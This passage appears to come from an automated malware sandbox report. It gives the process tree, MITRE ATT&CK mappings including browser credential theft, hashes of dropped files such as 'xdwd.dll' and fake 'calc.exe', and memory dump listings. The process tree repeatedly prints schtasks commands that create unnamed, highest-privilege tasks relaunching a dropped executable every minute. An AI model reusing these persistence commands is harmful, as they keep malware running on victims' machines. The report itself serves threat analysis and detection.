"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:6032

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:4220

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:4324

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:5336

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:1412

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:6012

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
PID:5932

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:6128

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:5632

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:1284

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:5380

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5604

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:5904

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1644

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
- Executes dropped EXE
PID:4120

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST & exit
2⤵
PID:3652

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 1 /tn "" /tr "C:\Windows\xdwd" /RL HIGHEST
3⤵
- Scheduled Task/Job: Scheduled Task
PID:5260

C:\Windows\system32\cmd.exe
"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST & exit
2⤵
PID:5436

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc minute /mo 30 /tn "" /tr "C:\Users\Admin\AppData\Roaming\xdwd" /RL HIGHEST
3⤵
PID:4332

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5472

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:6064

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4424

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5156

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:1768

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:224

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5652

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5864

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4772

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:1316

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5212

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5352

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4464

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5532

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:1120

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4332

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:3304

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4692

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:6024

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5172

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:1680

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:2712

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5340

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:2300

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4844

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5300

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5424

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:3896

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:1068

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:692

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5264

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5584

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5600

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:1932

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:216

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5848

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5648

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:64

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:3036

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:2076

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5468

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4120

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:6140

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4536

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:464

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:1900

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5884

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5328

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:1132

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5444

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5132

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:2404

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5660

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:6016

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:1816

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5244

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:6092

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4324

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4728

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:1708

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5152

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:2704

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:5808

C:\Windows\xdwd
C:\Windows\xdwd
1⤵
PID:4244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Event Triggered Execution

T1546

AppInit DLLs

T1546.010

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Sync Center.exe.log

Filesize
1KB

MD5
d7e08a6cf500fe5ab87b41795962ee19

SHA1
dd08782055e3e72f7a8c14ee8a27953825b18c6a

SHA256
e74f68eef03565053effbbfb8a786c8858edea751f40cd8c1030ca673f6ba161

SHA512
d4d694cde80f00642174c564969c228ae69dd31707b8e9cf52b5564b98b34d1c20857fddfeff66b597bab150be18b8166425f6cc1001c6154ba77611f0bec4d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\calc.exe.log

Filesize
642B

MD5
e19ed69089e56bbfaaba5e5e63d0354f

SHA1
287519bf7c4ec630e4326db00809f627f927ebef

SHA256
f9481e31897c3d9071b744e1638942b52c46858c16ccf692f5c6e109a8b092f6

SHA512
c4a8678d28eea4c3a3adfe0324943478efabef839d3bdacb0e4c278e97ee356037c0bfd83b096952b43d81af0b7253eb7d666416e0024ce93a1c516a834fd05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\launcher.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
60945d1a2e48da37d4ce8d9c56b6845a

SHA1
83e80a6acbeb44b68b0da00b139471f428a9d6c1

SHA256
314b91c00997034d6e015f40230d90ebbf57de5dc938b62c1a214d591793dbe3

SHA512
5d068f1d6443e26ae3cad1c80f969e50e5860967b314153c4d3b6efd1cfa39f0907c6427bec7fa43db079f258b6357e4e9a1b0b1a36b1481d2049ea0e67909ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
eb1ad317bd25b55b2bbdce8a28a74a94

SHA1
98a3978be4d10d62e7411946474579ee5bdc5ea6

SHA256
9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98

SHA512
d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
15dde0683cd1ca19785d7262f554ba93

SHA1
d039c577e438546d10ac64837b05da480d06bf69

SHA256
d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

SHA512
57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3072fa0040b347c3941144486bf30c6f

SHA1
e6dc84a5bd882198583653592f17af1bf8cbfc68

SHA256
da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e

SHA512
62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
e58749a7a1826f6ea62df1e2ef63a32b

SHA1
c0bca21658b8be4f37b71eec9578bfefa44f862d

SHA256
0e1f0e684adb40a5d0668df5fed007c9046137d7ae16a1f2f343b139d5f9bc93

SHA512
4cf45b2b11ab31e7f67fff286b29d50ed28cd6043091144c5c0f1348b5f5916ed7479cf985595e6f096b586ab93b4b5dce612f688049b8366a2dd91863e98b70

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
da5c82b0e070047f7377042d08093ff4

SHA1
89d05987cd60828cca516c5c40c18935c35e8bd3

SHA256
77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

SHA512
7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
10890cda4b6eab618e926c4118ab0647

SHA1
1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

SHA256
00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

SHA512
a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
dd1d0b083fedf44b482a028fb70b96e8

SHA1
dc9c027937c9f6d52268a1504cbae42a39c8d36a

SHA256
cab7944d29e0501dc0db904ac460ca7a87700e0ec7eb62298b7b97cbf40c424c

SHA512
96bec38bfda176292ae65dcf735103e7888baa212038737c1d1e215fcb76e4c0355e4a827a1934303e7aecae91012fa412f13e38f382b732758bae985cc67973

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ce4540390cc4841c8973eb5a3e9f4f7d

SHA1
2293f30a6f4c9538bc5b06606c10a50ab4ecef8e

SHA256
e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105

SHA512
2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6e09573715495338a569f0316d59af57

SHA1
1a9fd3073801c241b276cdb8b3d7035afbcd0c8d

SHA256
bdad2d4c1b3475754cb3b9ef41a9eda243f46e30117539f81399c977a459b570

SHA512
61add4e0cfef5f138e95f0d941c39c0bce038a47fbc262d5622a0fdf46621231653adfcca3b81bef3a662a37c288e1e9644bed44591551aea5399a370afaeced

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b1a1d8b05525b7b0c5babfd80488c1f2

SHA1
c85bbd6b7d0143676916c20fd52720499c2bb5c6

SHA256
adad192fc86c2f939fd3f70cb9ad323139a4e100f7c90b4454e2c53bdbc9b705

SHA512
346c6513c1373bab58439e37d3f75de1c5c587d7eb27076cf696e885a027b3b38d70b585839d1a2e7f2270cdcf0dac8c1fdff799f3b1158242ae9e3364c2a06e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d8cb3e9459807e35f02130fad3f9860d

SHA1
5af7f32cb8a30e850892b15e9164030a041f4bd6

SHA256
2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

SHA512
045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
31a287524525945b2b7252bd7d4b9fbe

SHA1
3064cff52c91b160cca9c704e64e815535c8d765

SHA256
51503d597e05ef2e1f0d5d7d55a53716c16efdd399e5912dfbe97e2be68f92b2

SHA512
5b7b13fa99a0fdac9ea736618e9ae783db9f4c0194047f3025bb8392f349bda9421af345392ef6daaa5b9851d7e770d085762e1afb6336269ce48cd10af27357

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ef647504cf229a16d02de14a16241b90

SHA1
81480caca469857eb93c75d494828b81e124fda0

SHA256
47002672443e80410e55a0b6d683573ac27d70d803b57ee3c2818d1008669710

SHA512
a6d8c08c708eee6f7e700880ce79d2ba7cd0acbe8529d96e18f3e90ea1f3cf33fd801dd6eba6017cdd02769e968c48278c090c1deeac710124f79423cd862ee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
b51dc9e5ec3c97f72b4ca9488bbb4462

SHA1
5c1e8c0b728cd124edcacefb399bbd5e25b21bd3

SHA256
976f9534aa2976c85c2455bdde786a3f55d63aefdd40942eba1223c4c93590db

SHA512
0e5aa6cf64c535aefb833e5757b68e1094c87424abe2615a7d7d26b1b31eff358d12e36e75ca57fd690a9919b776600bf4c5c0e5a5df55366ba62238bdf3f280

Download Submit
C:\Users\Admin\AppData\Local\Temp\Sync Center.exe

Filesize
121KB

MD5
7b6c19c2c8fc4ff9cc5b136f22cf490d

SHA1
e557a697a268c54a73aaffd02d25e54c4f601719

SHA256
cf6c9880812d48fe7ba3a1d1a1692a881745a7fb8cf6534f94555dd7dd1c3353

SHA512
afe23d16011e1eb71ce3be9f8796cf0398cc9e01415c93cd4e8403f1ee84f48e23396ab7709b60d5a9e5b3e5daee9e8f90bae99e6a85ece6475fa8bdd82f953b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_urvqmw2b.3zy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\calc.exe

Filesize
487KB

MD5
7950f23fa7d7247cd85872a5d1b6c6f0

SHA1
c723fd76c158d23fdbb9a04a69e07f881189e254

SHA256
576e9428f3646860cbc76d91ee75224488f1b1c01ac26753141476a280784f93

SHA512
27c3ca7fab763360eb864145df6087bc1b6c7f43799acc0f314ae1aff45afc0a6f312838a3a73b08ba0a9346950a0b869768ac7242d631254294bebdeb0a684f

Download Submit
C:\Windows\xdwd.dll

Filesize
136KB

MD5
16e5a492c9c6ae34c59683be9c51fa31

SHA1
97031b41f5c56f371c28ae0d62a2df7d585adaba

SHA256
35c8d022e1d917f1aabdceae98097ccc072161b302f84c768ca63e4b32ac2b66

SHA512
20fd369172ef5e3e2fde388666b42e8fe5f0c2bfa338c0345f45e98af6561a249ba3ecc48c3f16efcc73f02ecb67b3ddb1e2e8f0e77d18fa00ac34e6379e50b6

Download Submit
memory/964-42-0x0000000000F80000-0x0000000000FFE000-memory.dmp

Filesize
504KB

Download
memory/1492-67-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/1492-1-0x0000000000DB0000-0x0000000000E3E000-memory.dmp

Filesize
568KB

Download
memory/1492-0-0x00007FFF71523000-0x00007FFF71525000-memory.dmp

Filesize
8KB

Download
memory/1492-18-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/2288-373-0x0000023C221C0000-0x0000023C221C1000-memory.dmp

Filesize
4KB

Download
memory/2288-368-0x0000023C221C0000-0x0000023C221C1000-memory.dmp

Filesize
4KB

Download
memory/2288-355-0x0000023C221C0000-0x0000023C221C1000-memory.dmp

Filesize
4KB

Download
memory/2288-353-0x0000023C221C0000-0x0000023C221C1000-memory.dmp

Filesize
4KB

Download
memory/2288-370-0x0000023C221C0000-0x0000023C221C1000-memory.dmp

Filesize
4KB

Download
memory/2288-374-0x0000023C221C0000-0x0000023C221C1000-memory.dmp

Filesize
4KB

Download
memory/2288-369-0x0000023C221C0000-0x0000023C221C1000-memory.dmp

Filesize
4KB

Download
memory/2288-372-0x0000023C221C0000-0x0000023C221C1000-memory.dmp

Filesize
4KB

Download
memory/2288-371-0x0000023C221C0000-0x0000023C221C1000-memory.dmp

Filesize
4KB

Download
memory/2288-354-0x0000023C221C0000-0x0000023C221C1000-memory.dmp

Filesize
4KB

Download
memory/2948-1288-0x0000000003370000-0x0000000003382000-memory.dmp

Filesize
72KB

Download
memory/2948-1646-0x000000001F500000-0x000000001F5CA000-memory.dmp

Filesize
808KB

Download
memory/3320-66-0x0000000000A60000-0x0000000000A84000-memory.dmp

Filesize
144KB

Download
memory/4364-17-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/4364-14-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/4364-13-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/4364-12-0x00007FFF71520000-0x00007FFF71FE1000-memory.dmp

Filesize
10.8MB

Download
memory/4364-7-0x000001C3EFA10000-0x000001C3EFA32000-memory.dmp

Filesize
136KB

Download